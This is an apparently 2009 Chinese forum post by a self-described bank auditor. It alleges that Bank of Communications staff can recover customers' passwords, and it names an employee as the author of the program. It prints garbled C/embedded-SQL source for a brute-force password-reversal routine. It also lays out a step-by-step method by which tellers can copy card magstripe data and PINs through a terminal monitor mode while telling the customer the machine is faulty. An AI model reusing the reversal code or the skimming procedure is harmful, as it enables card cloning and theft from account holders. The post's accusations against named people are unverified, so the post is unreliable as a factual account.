交行员工窃取客户银行卡信息和卡交易密码的简易方法

qrhcn2391

交行员工窃取客户银行卡信息和卡交易密码的简易方法
　　
　　交行电脑人员窃取方法
　　
　　/******************************************************************************
　　**   本程序用于反推用户所留密码      **
　　******************************************************************************/
　　#include <stdio.h>
　　#include “batch.h”
　　#include “sybasqlex.h”
　　#include <va_list.h>
　　#include <stdarg.h>
　　
　　EXEC SQL INCLUDE SQLCA;
　　EXEC SQL WHENENER SQLERROR CALL error_handle();
　　EXEC SQL WHENEVER SQLWARNING CALL warning_handle();
　　EXEC SQL WHENEVER NOT FOUND CALL notfound_handle();
　　Main()
　　{
　　   EXEC SQL BEGIN DECLARE SECTION;
　　     CS_DATETIME p_ltdt,p_todt,NXDT;
　　     int cnt,p_status;
　　     char CHG_YN;
　　     char user[20],password[20];
　　   EXEC SQL END DECLARE SECTION;
　　  Char date_str[4];
　　     Int I = 0,count = 0;
　　     Int j,k;
　　     Int i1,i2,i3,a;
　　     Chr str1[7],str2[7];
　　     FILE *fp;
　　     Memset(str1,’\0’,sizeof(str1));
　　     Memset(str2,’\0’,sizeof(str2));
　　     Printf(“本程序用于反推用户所留密码＼n＼n”);
　　     Printf(“输入加密后密码：”);
　　     Scanf(“%d”,&a);
　　     If(a>=1000000||a<=0)
　　     {
　　        Printf(“输入错误！＼n＂)；
　　
　　
　　
　　
　　Return -1;
　　     }
　　     For(i=0;i<100;i++)
　　     {
　　      J = i*1000000+a;
　　      Cnt = j／3579;
　　      K =j％3579;
　　      If(k==0)
　　      {
　　      For(i1 = 0;i1<=99;i1++)
　　        {
　　        For(i2 = 0; i2<=99;i2++)
　　          {
　　          For(i3= 0; i3<=99;i3++)
　　            {
　　            If(i1*83+i2*97+i3*89==cnt)
　　            {
　　              Sprintf(str1,＂%2d%2d%2d”,i1,i2,i3);
　　               For (k = 1;k<6;k++)
　　               {
　　                 If (str1[k] !=’ ‘)
　　                  Str2[k-1]=str1;
　　                 Else
　　                  Str2[k-1]=’0’;
　　               }
　　                 If(str1[0]!=’ ‘
　　                 Str2[5]=str1[0];
　　                 Else
　　                 Str2[5]=’0’
　　                 Printf(“%s\n”,str2);
　　                 Count++;
　　             }
　　            }
　　          }
　　         }
　　      }
　　      }
　　      If(count == 0)
　　       Printf(“不可能有这样的密码!\n”);
　　      Slse
　　       Printf(“共 %d 种可能\n”,count);
　　      Return BCS_OK;
　　ERR_RET:
　　      Return BCS_ERR;
　　}
　　
　　
　　程序来源:
　　上述程序是本人从交通银行长沙分行数据中心主机上打印下来的一个源程序.当然该主机上还有相对应的运行程序.运行程序无法打印.我本人多次运行该程序反推用户密码
　　.
　　程序编制人:
　　该程序由交通银行长沙分行员工王春旺在交通银行总行开发中心编制.
　　
　　程序发放范围:
　　总行电脑部将这个程序和别的程序一起打包发放到了交行所有分行.因此反推客户密码不是交通银行员工个人行为.
　　
　　程序功能:
　　如源程序自已说明,该程序能反推出在交通银行存钱客户几乎所有的密码;定期存单,活期存折,定活一本通,和银行卡的查询密码.就本人所知:除银行卡的交易密码外该程序能反推出交行客户的所有密码.
　　
　　程序使用目的和实际案例:
　　没有证据证明交通银行总行下发该密码反推程序是支持交行员工窃取客户资金,但是据交行内部通报,交行江西分行的一电脑处员工通过内网获取外省一银行卡信息,制作伪卡,反推出卡密码,到北京一家大型商埸疯狂消费.第二次进同一家商埸消费时被抓获.交行通报中没有明确说明卡密码是怎样反推的,能肯定的是案件发生后交通银行没有对上述密码反推程序进行清理.在该案件发生后,交行电脑员工一致认为:只要该江西分行的电脑处员工不到同一商埸两次刷卡的话公安就无法破案.
　　
　　交行提供的法律保护:
　　该交行江西分行员工只要没有被当埸抓获,交通银行也许就会对其违法行为提供无意识法律保护.这样说也许有点过分.但是,事实上:在江西电脑员工案件发生之后杭州发生的一案件就能充分证明.杭州一位王姓女士的交行卡内五万元人民币莫名失窃,该女士将交行起诉至法院.交行在明知交行员工能反推出客户密码的情况下,以<信用卡章程>中规定,用户密码只有用户本人知道为理据,以客户密码保管不当为由,要求法院判定客户败诉.行成事实上的”鼓励交行员工大胆反推客户密码”,只要不被现埸抓获就可以提供法律保护的可怕事实.
　　
　　交行主观恶意:
　　如果就上述情况说交通银行支持员工窃取客户卡中资金显得证据不足,下面的情况更能证明交通银行有主观故意.本人将上述密码反推程序,特别是交通银行银行卡交易密码可反推向交通银行总行进行举报.为证明银行卡交易密码本人确实能反推,本人以挂号信的方式向总行举报.信中除指出王春旺所编密码程序外,本人特给出一银行卡用户的卡号和本人反推出来的卡交易密码.(本人可提供挂号信存根).
　　本人有证据证明交通银行在接到本人的举报和江西案发之后并没有对交通银行系统中用户密码加密系统进行改进:
　　因为密码系统的改进涉及到电脑系统和用户二个方面.不但是交行要修改电脑程序(改进加密算法),更重要的是要通知所有客户修改原先所置密码.要命的是交通银行必须在通知中注明”因交通银行可反推所有客户密码”要求客户重置新密码时,必须与旧密码不同,否则责任自负.只有这样才能保证交行员工再也无法反推出客户密码.
　　本人手中除以上密码反推程序外,还有王春旺同时编的交通银行密码加密程序,当时.本人在发现如此严重问题的情况下,正是基于稽核人员的身份和责任,在交行长沙分行的主机中编制了针对电脑人员的监视程序.交行却诬陷本人编”有害”程序,打击本人.保护交行员工继续违法反推客户密码.
　　
　　 最后本人向总行报告:临柜人员可轻易作案的方法
　　
　　交行临柜员工获得客户银行卡磁条信息和卡交易密码的简易方法
　　由于交行给人以鼓励电脑员工反推客户密码的错觉,不但下发密码反推程序,提供法律保护,而且对稽核人员的监视进行无情的打击,这里本人向交总行举报一个电脑操作漏洞,交通银行临柜员工可以用一个极简便方法获取交行卡用户的卡磁条信息和卡交易密码.
　　
　　技术原理:
　　一.客户在柜台使用银行卡和在ATM(自动柜员机)上使用是一样的,要刷磁条和输密码二步.这就为临柜人员取得磁条信息和密码提供了条件.只要你有这方面的心计.
　　二交行临柜人员所用终端有一个特别的运行方式(通过键盘进入),”监视方式”,在该方式下的任何输入(无论是刷磁条还是输密码)都会显示在屏上,而且能屏拷打印下来.
　　
　　具体操作:
　　先在存折打印机中放入一张空白纸,用于拷贝磁条信息和密码
　　当持交通银行卡的客户在柜面上取钱时,柜员会做相应交易,交易中会有一步,提示刷卡并刷卡器灯亮,这时柜员可快速将终端设定为”监控方式”之后刷卡,这时卡磁条信息显示在屏上,按屏拷键打印.(磁条中的二位效验数都会显示出来)
　　关机重来, 这次是要在提示用户输密码时将终端设定为”监视方式”,用户输完密码回车后,密码显示在屏上,再次拷贝下来.
　　再次关机重来,并对客户说:对不起机器老出故障,这次按正常方式完成交易.但是你和交行江西分行的那位作案电脑员工一样,你窃取到了对该银行卡用户作案所需的信息.只要你不被现埸抓到,肯定是该持卡人自已泄露了卡密码.责任自负.
　　*注:该漏洞可以改进,但是简单的变换是没有用的,除非是……
　　
　　敬告交通银行用户
　　从上所述,如果交行柜员拿着你的卡在刷卡器上刷了多次,又要你输密码多次,你要小心了,该柜员可能在窃取你的卡磁条信息和密码,可能威胁到你卡中的钱.但是你看不到屏,你没证据.又当交通银行电脑人员用上述电脑程序在中心机房反推你存款密码时,你无法知道,你也没有证据.当你存在交行的钱失窃了(和杭州王女士一样),只能是你密码保管不当责任自负.假设是临柜员工用上述方法窃取了你的密码,或者电脑人员反推出了你的密码窃走了你的钱,除非是你将其当埸抓获,否则你还是没有任何办法,因为你没有证据,只能是你密码保管不当.你唯一能做的是:不要交通银行的卡,不将钱存到交通银行,不进交通银行的门.这是你保护自已的钱唯一能做的.
　　
　　如果交通银行对我以上投诉不回应,我将将密码反推源程序原件复印件和二份挂号信存根复印件及以上投诉寄给银监会,公安部,人民银行甚至国务院总理.
　　同时我将以上投诉在网上广发.
　　
　　再次申明:本人能反推交行卡交易密码,对所述负法律责任.
　　(一说到交行卡交易密码能反推,交行五毛党必说DES不可攻破,能破则获什么奖,这个奖早就被江西分行的电脑员工获得了.他何必用别人的卡到北京某商埸去消费被抓呢?)
　　
　　                 胡远志   2009年6月30日星期二
　　
　　
　　%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
　　一个比本帖更有意思的是：交通银行有组织地派人“顶”我的帖，称我 造谣
　　君见过，有人这么长时间、实名、举报述说有名有姓、有事有实的造谣者吗？你见过“造谣者”竟然威胁要举报到公安部。排名世界前十名的银行不敢用法律武器对付实名发帖人（他们称之为“造谣者”），而是派些见不得人的狗“汪汪”几声。难道看官你看不出真相！！！！！！！！！
　　%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
　　
   
   
   
   
   
   
   http://lb0398.com/kun/14061810.html